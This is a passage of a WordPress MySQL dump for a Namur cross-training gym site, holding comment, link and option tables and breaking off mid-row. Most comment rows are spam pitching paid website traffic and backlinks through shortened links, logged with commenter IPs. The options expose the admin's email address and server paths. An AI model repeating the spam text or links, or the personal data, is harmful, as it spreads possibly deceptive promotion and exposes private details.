(192, 1, 'Website Traffic', 'hcxsabcgr@gmail.com', 'http://0nulu.com/rjv', '81.171.58.79', '2018-01-23 18:00:40', '2018-01-23 18:00:40', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://0nulu.com/csy																				Unsubscribe here: http://0nulu.com/nbz', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(193, 1, 'Website Traffic', 'awbcuqc@gmail.com', 'http://0nulu.com/csy', '196.54.55.19', '2018-01-28 10:42:32', '2018-01-28 10:42:32', 'This is a comment to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://0nulu.com/sdq - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(194, 1, 'Carla French', 'aqcnfle@gmail.com', 'http://0nulu.com/csy', '196.52.84.40', '2018-02-03 10:51:57', '2018-02-03 10:51:57', 'I am reaching out since we saw a link to your website and thought you would be a good candidate for our traffic service. We provide targeted website traffic to virtually any type of website. We target our visitors by both country and keywords that you either submit to us or we can do keyword research for you. We offer a seven day FREE trial period with free traffic so that you can try our service to make sure it will work for you. Which of your websites needs the most growth? Find out more here:http://0nulu.com/opx																				Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(195, 1, 'Carla French', 'owzsxhxkyw@gmail.com', 'http://umr.dk/f', '81.171.81.247', '2018-02-09 10:44:50', '2018-02-09 10:44:50', 'I am reaching out since we saw a link to your website and thought you would be a good candidate for our traffic service. We provide targeted website traffic to virtually any type of website. We target our visitors by both country and keywords that you either submit to us or we can do keyword research for you. We offer a seven day FREE trial period with free traffic so that you can try our service to make sure it will work for you. Which of your websites needs the most growth? Find out more here: http://tgi.link/1fg99																				Unsubscribe here: http://gd.is/y/mun53', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(196, 1, 'Rebecca Sutton', 'uvhdjtvn@gmail.com', 'http://priscilarodrigues.com.br/url/v', '81.171.56.72', '2018-02-15 13:40:38', '2018-02-15 13:40:38', 'This is a message to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://insl.co/m - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://gd.is/y/mun53', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(197, 1, 'Barbara Kennedy', 'cxqflmju@gmail.com', 'http://insl.co/m', '185.225.208.9', '2018-02-27 13:33:00', '2018-02-27 13:33:00', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://insl.co/m																					Unsubscribe here: http://pzr.eu/18', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(198, 1, 'Ramona Jordan', 'eqnsplfas@gmail.com', 'http://stpicks.com/2rusd', '196.52.32.12', '2018-03-07 00:59:19', '2018-03-07 00:59:19', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your website: http://xahl.de/p - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(199, 1, 'Ramona Jordan', 'bjmjku@gmail.com', 'http://insl.co/11', '173.244.44.96', '2018-03-13 19:35:58', '2018-03-13 19:35:58', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://xahl.de/p																					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(200, 1, 'Kerry Beck', 'ucamyeq@gmail.com', 'http://url.euqueroserummacaco.com/3ewon', '81.171.81.235', '2018-03-26 12:16:33', '2018-03-26 12:16:33', 'Do you need more people to visit your website? We have a 7 day free trial that will drive targeted visitors to your website. If you have been struggling with getting your website in front of people then come try our traffic service risk free. Just click the link below to check out our service and select your package, each package includes a 7 day free trial period. There is no catch, if you don\'t like the service you can cancel during the trial period you will not be charged anything. These visitors are all targeted by the keywords and countries that you submit when you place your order. Start your free trial today: http://xahl.de/p																																																	Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(201, 1, 'Kerry Beck', 'fghpma@gmail.com', 'http://url.euqueroserummacaco.com/3ewon', '196.52.84.24', '2018-04-02 21:58:41', '2018-04-02 21:58:41', 'This is a message to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your site: http://stpicks.com/2rusd - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(202, 1, 'Kerry Beck', 'aglxixb@gmail.com', 'http://stpicks.com/2rusd', '81.171.85.92', '2018-04-09 03:00:11', '2018-04-09 03:00:11', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://url.euqueroserummacaco.com/3ewon																					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(203, 1, 'Kerry Beck', 'nozbact@gmail.com', 'http://url.euqueroserummacaco.com/3ewon', '196.52.84.21', '2018-04-16 19:33:31', '2018-04-16 19:33:31', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your site: http://stpicks.com/2rusd - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(204, 1, 'Kerry Beck', 'fcicyrepjoy@gmail.com', 'http://stpicks.com/2rusd', '185.225.208.7', '2018-04-23 08:52:34', '2018-04-23 08:52:34', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your site: http://url.euqueroserummacaco.com/3ewon - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(205, 1, 'Kerry Beck', 'coymxppedd@dwuqvpphgui.com', 'http://stpicks.com/2rusd', '82.102.21.98', '2018-05-03 09:48:30', '2018-05-03 09:48:30', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://xahl.de/p																				Unsubscribe here: http://xahl.de/q', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(206, 1, 'Monica', 'ydiqluczien@grampfkcf.com', 'https://bwlink.io/erhqf', '46.246.123.27', '2018-05-11 15:48:09', '2018-05-11 15:48:09', 'Need to rank your website? Get some free backlinks here: https://bwlink.io/erhqf We use a natural link building strategy to build awesome in-content backlinks. Our massive team of copywriters create original, semantically relevant content around your subject matter. We then post that content around the web to make your website go viral in the eyes of Google. Start your free trial today: http://corta.co/gpQm                                  																				Unsubscribe: https://bwlink.io/39imp', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(207, 1, 'Monica', 'klqdpogjpjg@emivrauvwe.com', 'https://bwlink.io/erhqf', '81.171.74.144', '2018-05-23 07:53:12', '2018-05-23 07:53:12', 'Need to rank your website? Get some free backlinks here: https://bwlink.io/erhqf We use a natural link building strategy to build awesome in-content backlinks. Our massive team of copywriters create original, semantically relevant content around your subject matter. We then post that content around the web to make your website go viral in the eyes of Google. Start your free trial today: http://y.rxhnet.de/i                                  																				Unsubscribe: https://bwlink.io/39imp', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(208, 1, 'Amber Stevens', 'wxqllqhnv@oydijkv.com', 'http://url.euqueroserummacaco.com/3ewon', '196.54.55.8', '2018-06-06 02:51:22', '2018-06-06 02:51:22', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://stpicks.com/2rusd																				Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(209, 1, 'Amber Stevens', 'ipihbgwlu@kbkfvxhsih.com', 'http://url.euqueroserummacaco.com/3ewon', '81.171.107.126', '2018-06-19 03:32:36', '2018-06-19 03:32:36', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://xahl.de/p																				Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(210, 1, 'Targeted website visitors', 'nrdkasts@lwzvcicpz.com', 'http://insl.co/11', '81.171.107.54', '2018-07-22 07:02:22', '2018-07-22 07:02:22', 'This is a message to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your site: http://stpicks.com/2rusd - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(211, 1, 'Anne Cross', 'cross.anne@googlemail.com', 'http://insl.co/11', '185.220.70.147', '2018-07-24 10:26:27', '2018-07-24 10:26:27', 'For a limited time we have lowered the rate on targeted website traffic. We have visitors from virtually every country on Earth. Each visitor is targeted by both country and keywords that you submit when you start your free trial period. If you need more visitors or product sales try our service free for seven days and we will send you 500 free visitors during the trial. There are no contracts and if you cancel during the trial period you will not be charged anything! Start your trial today: http://insl.co/11\r\n\r\n\r\n\r\n\r\n\r\n\r\nUnsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0', '', 0, 0),
(212, 1, 'Targeted website visitors', 'adgeqkt@stufuehsg.com', 'https://flust.de/tpuwx', '81.171.57.133', '2018-07-31 12:39:32', '2018-07-31 12:39:32', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your website: https://flust.de/tpuwx - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(213, 1, 'Shana Marley', 'oiuocryb@vfyaeatrjz.com', 'https://flust.de/tpuwx', '82.102.20.180', '2018-09-30 17:29:00', '2018-09-30 17:29:00', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: https://flust.de/tpuwx																				Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(214, 1, 'Dianne Bennett', 'jsktekanylq@auwpwmkgrd.com', 'https://flust.de/tpuwx', '81.171.98.56', '2018-10-07 20:41:55', '2018-10-07 20:41:55', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://duckshop.co/1f1p																				Unsubscribe here: http://stpicks.com/2ruse', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(215, 1, 'Nicole Mawrey', 'pkxptwn@bjcbifyhqyl.com', 'https://38x.de/92sj7', '185.77.248.7', '2018-10-22 20:28:57', '2018-10-22 20:28:57', 'I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://www.1lnk.net//1ol7																					Unsubscribe here: https://twe.lv/gg', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(216, 1, 'Nicole Mawrey', 'fcohmcwvqyr@xewftmz.com', 'https://38x.de/92sj7', '89.238.154.23', '2018-10-31 02:08:23', '2018-10-31 02:08:23', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: https://38x.de/92sj7																					Unsubscribe here: https://twe.lv/gg', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(217, 1, 'Heidi Wright', 'abrbvlx@pxwxrbkxyj.com', 'http://www.1lnk.net//1ol7', '185.220.70.143', '2018-11-18 23:28:57', '2018-11-18 23:28:57', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your website: http://utiny.ml/1yC - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: https://twe.lv/gg', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(218, 1, 'Alice Lowe', 'adljotzimoz@usxumnr.com', 'http://wntdco.mx/dkfzt', '81.171.58.54', '2018-12-07 06:23:47', '2018-12-07 06:23:47', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Check it out here: http://shortener.ncores.eu/ey																				Unsubscribe here: http://2url.de/1alt', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(219, 1, 'Alice Lowe', 'scyawdv@xggslodtgwg.com', 'http://wntdco.mx/dkfzt', '209.107.214.56', '2018-12-13 14:28:27', '2018-12-13 14:28:27', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your website: http://wntdco.mx/dkfzt - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://2url.de/1alt', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(220, 1, 'Kelley Brown', 'vzchzhdg@iaskuw.com', 'http://s.th3kevmaster74.de/2pn4', '64.145.94.153', '2018-12-26 12:07:23', '2018-12-26 12:07:23', 'This is a message to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will dramatically increase your traffic to your site: http://sp7.site/7 - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://sp7.site/8', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);

-- --------------------------------------------------------

--
-- Structure de la table `wp_links`
--

CREATE TABLE `wp_links` (
  `link_id` bigint(20) UNSIGNED NOT NULL,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) UNSIGNED NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `wp_options`
--

CREATE TABLE `wp_options` (
  `option_id` bigint(20) UNSIGNED NOT NULL,
  `option_name` varchar(191) DEFAULT NULL,
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_options`
--

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://www.crosstrainingcenter.be', 'yes'),
(2, 'blogname', 'Cross Training Center (Namur)', 'yes'),
(3, 'blogdescription', '', 'yes'),
(4, 'users_can_register', '0', 'yes'),
(5, 'admin_email', 'dpierrard@gmail.com', 'yes'),
(6, 'start_of_week', '1', 'yes'),
(7, 'use_balanceTags', '0', 'yes'),
(8, 'use_smilies', '1', 'yes'),
(9, 'require_name_email', '1', 'yes'),
(10, 'comments_notify', '1', 'yes'),
(11, 'posts_per_rss', '10', 'yes'),
(12, 'rss_use_excerpt', '0', 'yes'),
(13, 'mailserver_url', 'mail.example.com', 'yes'),
(14, 'mailserver_login', 'login@example.com', 'yes'),
(15, 'mailserver_pass', 'password', 'yes'),
(16, 'mailserver_port', '110', 'yes'),
(17, 'default_category', '1', 'yes'),
(18, 'default_comment_status', 'open', 'yes'),
(19, 'default_ping_status', 'open', 'yes'),
(20, 'default_pingback_flag', '1', 'yes'),
(21, 'posts_per_page', '10', 'yes'),
(22, 'date_format', 'F j, Y', 'yes'),
(23, 'time_format', 'g:i a', 'yes'),
(24, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(28, 'comment_moderation', '0', 'yes'),
(29, 'moderation_notify', '1', 'yes'),
(30, 'permalink_structure', '/%postname%/', 'yes'),
(32, 'hack_file', '0', 'yes'),
(33, 'blog_charset', 'UTF-8', 'yes'),
(34, 'moderation_keys', '', 'no'),
(35, 'active_plugins', 'a:3:{i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:4;s:25:\"easy-table/easy-table.php\";i:7;s:47:\"really-simple-captcha/really-simple-captcha.php\";}', 'yes'),
(36, 'home', 'http://www.crosstrainingcenter.be', 'yes'),
(37, 'category_base', '', 'yes'),
(38, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(40, 'comment_max_links', '2', 'yes'),
(41, 'gmt_offset', '0', 'yes'),
(42, 'default_email_category', '1', 'yes'),
(43, 'recently_edited', 'a:5:{i:0;s:58:\"/home/crosstra/www/wp-content/themes/figero/front-page.php\";i:1;s:53:\"/home/crosstra/www/wp-content/themes/figero/style.css\";i:3;s:55:\"/home/crosstra/www/wp-content/themes/figero/sidebar.php\";i:4;s:53:\"/home/crosstra/www/wp-content/themes/figero/index.php\";i:5;s:57:\"/home/crosstra/www/wp-content/themes/figero/functions.php\";}', 'no'),
(44, 'template', 'figero', 'yes'),
(45, 'stylesheet', 'figero', 'yes'),
(46, 'comment_whitelist', '1', 'yes'),
(47, 'blacklist_keys', '', 'no'),
(48, 'comment_registration', '0', 'yes'),
(49, 'html_type', 'text/html', 'yes'),
(50, 'use_trackback', '0', 'yes'),
(51, 'default_role', 'subscriber', 'yes'),
(52, 'db_version', '38590', 'yes'),
(53, 'uploads_use_yearmonth_folders', '1', 'yes'),
(54, 'upload_path', '', 'yes'),
(55, 'blog_public', '1', 'yes'),
(56, 'default_link_category', '2', 'yes'),
(57, 'show_on_front', 'posts', 'yes'),
(58, 'tag_base', '', 'yes'),
(59, 'show_avatars', '1', 'yes'),
(60, 'avatar_rating', 'G', 'yes'),
(61, 'upload_url_path', '', 'yes'),
(62, 'thumbnail_size_w', '150', 'yes'),
(63, 'thumbnail_size_h', '150', 'yes'),
(64, 'thumbnail_crop', '1', 'yes'),
(65, 'medium_size_w', '300', 'yes'),
(66, 'medium_size_h', '300', 'yes'),
(67, 'avatar_default', 'mystery', 'yes'),
(68, 'large_size_w', '1024', 'yes'),
(69, 'large_size_h', '1024', 'yes'),
(70, 'image_default_link_type', 'file', 'yes'),
(71, 'image_default_size', '', 'yes'),
(72, 'image_default_align', '', 'yes'),
(73, 'close_comments_for_old_posts', '0', 'yes'),
(74, 'close_comments_days_old', '14', 'yes'),
(75, 'thread_comments', '1', 'yes'),
(76, 'thread_comments_depth', '5', 'yes'),
(77, 'page_comments', '0', 'yes'),
(78, 'comments_per_page', '50', 'yes'),
(79, 'default_comments_page', 'newest', 'yes'),
(80, 'comment_order', 'asc', 'yes'),
(81, 'sticky_posts', 'a:0:{}', 'yes'),
(82, 'widget_categories', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(83, 'widget_text', 'a:3:{i:2;a:9:{s:5:\"title\";s:1:\" \";s:4:\"text\";s:373:\"<iframe src=\"//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FCrossTrainingCenterDeNamur&amp;width=280&amp;height=590&amp;show_faces=true&amp;colorscheme=light&amp;stream=true&amp;show_border=false&amp;header=true\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:280px; height:590px;\" allowTransparency=\"true\"></iframe>\";s:6:\"filter\";b:0;s:7:\"page-20\";i:1;s:7:\"page-22\";i:1;s:7:\"page-11\";i:1;s:6:\"page-5\";i:1;s:10:\"dw_include\";i:1;s:9:\"other_ids\";s:0:\"\";}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:815:\"<b><u>Adresse :</u></b><br> \r\nBowling et squash de Namur<br>\r\n251 Chssée de Perwelz<br>\r\n5002 Saint-Servais<br>\r\n<br>\r\n<br>\r\n<iframe width=\"280\" height=\"280\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=251+CHAUSS%C3%89E+DE+PERWEZ+-5002+SAINT-SERVAIS&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;t=m&amp;z=14&amp;ll=50.483687,4.854333&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=251+CHAUSS%C3%89E+DE+PERWEZ+-5002+SAINT-SERVAIS&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;t=m&amp;z=14&amp;ll=50.483687,4.854333&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>\r\n\";s:6:\"filter\";b:0;s:10:\"dw_include\";i:1;s:9:\"other_ids\";s:0:\"\";s:6:\"page-9\";i:1;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(84, 'widget_rss', 'a:0:{}', 'yes'),
(85, 'uninstall_plugins', 'a:1:{s:31:\"slideshow-manager/slideshow.php\";s:25:\"delete_slideshow_database\";}', 'no'),
(86, 'timezone_string', '', 'yes'),
(87, 'page_for_posts', '0', 'yes'),
(88, 'page_on_front', '0', 'yes'),
(89, 'default_post_format', '0', 'yes'),
(90, 'link_manager_enabled', '0', 'yes'),
(91, 'initial_db_version', '22441', 'yes'),
(92, 'wp_user_roles', 'a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:62:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"total_slider_manage_slides\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\